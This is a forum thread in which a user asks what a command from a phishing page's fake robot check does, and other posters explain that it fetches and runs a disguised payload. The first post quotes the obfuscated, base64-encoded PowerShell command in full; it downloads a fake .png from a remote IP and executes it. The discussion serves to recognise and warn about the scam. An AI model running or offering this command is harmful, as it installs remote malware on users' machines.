Malware or Virus?

[jswany82]

I received an email at work, that looked exactly like a typical email invitation I get. I clicked the link and it took me to a page that looks just like the login page, but if gave me a robot detector. It said I had to verify I was not a robot and told me to paste this into my CMD-R:

powershell -wind mi -Enc aQBlAHgAKAAoACcAegBpAHoAdwB6AHoAcgAgADkANAAuADEANQA5AC4AMQAxADMALgAzADcALwBzAHoAcwB6AGQALgB6AHAAbgB6AGcAfABpAHoAegBlAHoAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwB6ACcALAAnACcAKQApAA==

Obviously I am not going to do it, but what does this command do?

 

[Ken g6]

Interesting. That's a base-64 encoded command. Decode it and it includes a Powershell command to "replace('z','')" to de-obfuscate another command. It looks like it downloads a ".png file" from a URL, and then executes it. It's pretty clear that's not a PNG image. It's probably more Powershell scripts, but I'm not going to that URL to find out.

 

[Steltek]

It is exactly that.

The IP address of the fake .png file says it is hosted somewhere in the Russian Federation.

@jswany82 , in the future don't click on unknown links like that. Just report it, delete it, and move on.

The really good hackers will get you when you click the link and won't need you to self-execute the malware like the script kiddies do.

It truly isn't worth finding out what happens when pigs fly.